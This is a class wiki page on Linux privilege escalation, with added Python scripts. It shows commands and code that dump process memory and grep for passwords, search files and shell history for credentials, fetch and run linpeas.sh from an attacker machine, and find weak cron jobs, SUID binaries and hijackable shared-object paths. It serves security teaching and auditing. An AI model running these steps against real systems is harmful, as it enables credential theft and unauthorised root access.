0.00 Class 8 Linux Privilege escalation - cloudsecuritylabs/ethicalhackingclass GitHub Wiki
- User space
- Kernel space
- Kernel vulnerabilities
- Password cracking with John the Ripper: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- Race conditions: https://docs.microsoft.com/en-us/dotnet/standard/security/security-and-race-conditions
- Dump a running process's memory and search it for credentials (needs ptrace rights on the target: the same user as the process, or root):
ps -ef
ps -ef | grep <service>
gdb -p <PID>
(gdb) info proc mappings   # lists the mapped memory regions; note the start and end address of [heap]
(gdb) dump memory <OUTPUT_FILE> <START_ADDRESS> <STOP_ADDRESS>
strings <OUTPUT_FILE> | grep -i passw
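The same procedure as an added example in Python (this is not code from the class wiki): it parses /proc/<pid>/maps to find the [heap] mapping, reads that range from /proc/<pid>/mem and searches it for printable strings containing a keyword, which is what `info proc mappings`, `dump memory` and `strings | grep` do together. Reading another process's memory needs ptrace rights on it (same uid, or root, subject to /proc/sys/kernel/yama/ptrace_scope). The maps text and byte buffer used in the checks are constructed samples.

```python
"""Added example: gdb-free heap dump and credential grep via /proc."""
import os
import re
import sys

# One line of /proc/<pid>/maps: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S+)\s+\S+\s+\S+\s+\S+\s*(?P<path>.*)$"
)


def parse_maps(text):
    """Return [(start, end, perms, path)] for every line of a maps file."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if m:
            regions.append((int(m["start"], 16), int(m["end"], 16), m["perms"], m["path"]))
    return regions


def find_region(regions, name="[heap]"):
    """(start, end) of the first readable mapping whose path is `name`."""
    for start, end, perms, path in regions:
        if path == name and perms.startswith("r"):
            return start, end
    raise LookupError(f"no readable mapping named {name}")


def dump_region(pid, start, end):
    """Equivalent of gdb's `dump memory`: read [start, end) from /proc/<pid>/mem."""
    with open(f"/proc/{pid}/mem", "rb") as mem:
        mem.seek(start)
        return mem.read(end - start)


def grep_strings(data, keyword=b"passw", min_len=4):
    """Equivalent of `strings | grep -i keyword`: printable runs of at least
    min_len bytes that contain keyword, case-insensitively, in file order."""
    kw = keyword.lower()
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    return [run.decode("ascii") for run in runs if kw in run.lower()]


def search_process_heap(pid, keyword=b"passw"):
    """Keyword hits in the heap of process `pid`."""
    with open(f"/proc/{pid}/maps") as maps:
        regions = parse_maps(maps.read())
    start, end = find_region(regions)
    return grep_strings(dump_region(pid, start, end), keyword)


if __name__ == "__main__":
    # Usage: python3 heapgrep.py <PID> [keyword]; defaults to this process itself.
    pid = int(sys.argv[1]) if len(sys.argv) > 1 else os.getpid()
    keyword = sys.argv[2].encode() if len(sys.argv) > 2 else b"passw"
    for hit in search_process_heap(pid, keyword):
        print(hit)
```

The heap is only the first place to look; services often keep secrets in anonymous mmap regions or thread stacks, so passing a different `name` to find_region (or iterating over every readable region) is a natural extension.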
- Grep the filesystem for password strings (-r recursive, -n line numbers, -w whole word, -i case-insensitive; -I skips binary files):
grep --color=always -rnw / -ie "password" 2>/dev/null
find /etc -type f -exec grep -i -I "PASS" {} /dev/null \;
- Serve linpeas.sh from the attacker machine and fetch it on the target (SimpleHTTPServer is Python 2; with Python 3 use python3 -m http.server 80):
sudo python -m SimpleHTTPServer 80
wget http://<KALI-VM-IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
- Shell history often contains credentials typed on the command line:
cat /home/user/.bash_history | grep "pass"
# e.g. a matching history line: mysql -u ADMIN -p SECRET
- Many ways to attack using cron; start by enumerating the system crontab, the per-user crontabs and the cron/at access-control files:
cat /etc/crontab
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
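Once the crontabs are listed, the question is which jobs an unprivileged user can influence. The following added example (not code from the class wiki) parses files in /etc/crontab format (minute hour dom month dow user command, plus VAR=value lines, as also used by /etc/cron.d/*) and flags three classic misconfigurations: the job's script is writable by the current user, the script is missing but its directory is writable, or the command is relative and an earlier directory in the crontab's PATH is writable (PATH hijack). The default PATH value and the crontab built by demo() are assumptions and constructed samples, not taken from any real system.

```python
"""Added example: find cron jobs whose executable an unprivileged user controls."""
import os
import shlex
import tempfile

DEFAULT_PATH = "/usr/bin:/bin"  # assumption: what cron uses when the file sets no PATH


def parse_system_crontab(text):
    """Return (env, [(user, command)]) from /etc/crontab-style text."""
    env = {"PATH": DEFAULT_PATH}
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line[0] not in "0123456789*@":          # VAR=value environment line
            name, _, value = line.partition("=")
            env[name.strip()] = value.strip().strip('"')
            continue
        fields = line.split(None, 6)
        if fields[0].startswith("@"):               # @reboot / @daily ... user command
            if len(fields) < 3:
                continue
            user, command = fields[1], " ".join(fields[2:])
        else:                                       # m h dom mon dow user command
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        jobs.append((user, command))
    return env, jobs


def executable_of(command):
    """First token of the command line, honouring shell quoting."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return tokens[0] if tokens else ""


def classify_target(target, path_env):
    """'writable', 'creatable', 'path-hijack:<dir>' or None for a job's executable."""
    if target.startswith("/"):
        if os.path.exists(target):
            return "writable" if os.access(target, os.W_OK) else None
        return "creatable" if os.access(os.path.dirname(target), os.W_OK) else None
    for directory in path_env.split(":"):
        candidate = os.path.join(directory, target)
        if os.path.exists(candidate):               # real binary found; can we edit it?
            return "writable" if os.access(candidate, os.W_OK) else None
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            return f"path-hijack:{directory}"       # we can shadow it earlier in PATH
    return None


def find_weak_cron_jobs(paths):
    """[(file, user, executable, verdict)] for every suspicious job in `paths`."""
    findings = []
    for path in paths:
        try:
            with open(path) as f:
                env, jobs = parse_system_crontab(f.read())
        except OSError:
            continue
        for user, command in jobs:
            target = executable_of(command)
            verdict = classify_target(target, env["PATH"])
            if verdict:
                findings.append((path, user, target, verdict))
    return findings


def demo():
    """Constructed fixture in a temp dir: one writable script, one missing script
    in a writable directory, one relative command behind a writable PATH entry."""
    root = tempfile.mkdtemp(prefix="cron-demo-")
    os.mkdir(os.path.join(root, "bin"))
    script = os.path.join(root, "backup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    crontab = os.path.join(root, "crontab")
    with open(crontab, "w") as f:
        f.write(
            "# constructed sample, not a real crontab\n"
            f"PATH={root}/bin:{root}/sbin\n"
            f"*/5 * * * * root {script} --full\n"
            f"@reboot root {root}/missing.sh\n"
            "0 3 * * * root cleanup.sh >/dev/null 2>&1\n"
        )
    return [(user, target, verdict) for _, user, target, verdict in find_weak_cron_jobs([crontab])]


if __name__ == "__main__":
    for user, target, verdict in demo():
        print(f"{user:8} {verdict:40} {target}")
    # On a real host: find_weak_cron_jobs(["/etc/crontab"] + list of /etc/cron.d/* files)
```

Per-user crontabs (`crontab -l`) have no user column; to check those, split into 6 fields and take the owner from the spool file name. Running the check as root makes every path "writable", so run it as the low-privileged user whose reach you are assessing.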
ls -al
find / -type f -perm -u=s -ls 2>/dev/null
- SUID allows users to execute a binary with the permissions of the file owner (Linux ignores the SUID bit on interpreter scripts, so only compiled binaries matter here)
- If the owner is root, unprivileged users effectively run that binary as root
- In the permission string the owner's "x" is replaced with the SUID permission, denoted by the letter s (e.g. -rwsr-xr-x)
- GTFOBins (https://gtfobins.github.io/) is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems, including SUID binaries that can spawn a shell as their owner.
- strace is used to monitor and debug applications and processes and their interaction with the Linux kernel: it records the system calls a process makes, including every file it tries to open.
- Shared objects (.so files) are the Linux equivalent of Dynamically Linked Libraries (DLLs) on Windows. A SUID binary that looks for a shared object in a path the user can write to can be hijacked by placing a malicious .so there.
- Example lab binary: /usr/local/bin/suid-so. Trace it and look for libraries it fails to open:
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
strings /usr/local/bin/suid-so
- Caveat: the kernel ignores the SUID bit when a binary is executed under ptrace (which is how strace works), so the traced run executes as you; the trace still shows which paths the binary tries to load.
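The `grep` above leaves you reading the trace by eye. As an added example (not code from the class wiki), the script below parses strace output for shared objects the binary tried and failed to load (ENOENT) and keeps only those whose directory the current user can write, since a .so dropped there would be loaded with the owner's privileges when the binary runs without strace. The trace lines in demo(), the binary name /usr/local/bin/suid-so and the library names are constructed; on a real target you would feed it the output of `strace -f -o trace.txt /usr/local/bin/suid-so`.

```python
"""Added example: find hijackable missing shared objects in an strace log."""
import os
import re
import tempfile

# Matches lines such as
#   open("/usr/local/lib/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
#   openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
#   [pid 1234] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
SYSCALL = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?(?P<call>open|openat|access|stat)\('
    r'(?:AT_FDCWD,\s*)?"(?P<path>[^"]+)"[^)]*\)\s*=\s*(?P<ret>-?\d+)'
    r'(?:\s+(?P<errno>E[A-Z]+))?'
)
SO_NAME = re.compile(r"\.so(\.\d+)*$")   # libfoo.so, libc.so.6, libbar.so.1.2


def is_shared_object(path):
    """True for names shaped like a shared library (not e.g. /etc/ld.so.preload)."""
    return SO_NAME.search(os.path.basename(path)) is not None


def missing_shared_objects(strace_text):
    """Unique .so paths the traced process failed to open (ENOENT), in trace order."""
    missing = []
    for line in strace_text.splitlines():
        m = SYSCALL.match(line.strip())
        if not m or m["errno"] != "ENOENT" or not is_shared_object(m["path"]):
            continue
        if m["path"] not in missing:
            missing.append(m["path"])
    return missing


def hijackable(paths):
    """Those missing paths whose parent directory the current user can create files in."""
    return [p for p in paths if os.access(os.path.dirname(p), os.W_OK)]


def demo():
    """Constructed strace excerpt: one missing .so under a temp dir we own, one
    under a directory that does not exist, plus ordinary successful loads."""
    libdir = tempfile.mkdtemp(prefix="suid-so-demo-")
    trace = "\n".join([
        'execve("/usr/local/bin/suid-so", ["/usr/local/bin/suid-so"], 0x7ffd1234 /* 20 vars */) = 0',
        'access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)',
        'openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3',
        'openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3',
        f'open("{libdir}/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)',
        'open("/nonexistent-dir-for-demo/libother.so.1", O_RDONLY) = -1 ENOENT (No such file or directory)',
        f'[pid 4242] open("{libdir}/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)',
    ])
    missing = missing_shared_objects(trace)
    return missing, hijackable(missing)


if __name__ == "__main__":
    missing, weak = demo()
    print("missing shared objects:", missing)
    print("in directories we can write:", weak)
    # Real use: missing_shared_objects(open("trace.txt").read()) on an strace -f -o trace.txt log.
```

A second, quieter source of the same information is `ldd` or the RPATH/RUNPATH shown by `readelf -d` on the binary; strace has the advantage of also catching dlopen() calls made at runtime, which static inspection misses.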
- Edits made at the GRUB boot menu (changing the kernel command line at boot) are not persistent by default.
- They are gone the next time you boot.
- Making GRUB edits persistent needs an additional step: changing the GRUB configuration on disk.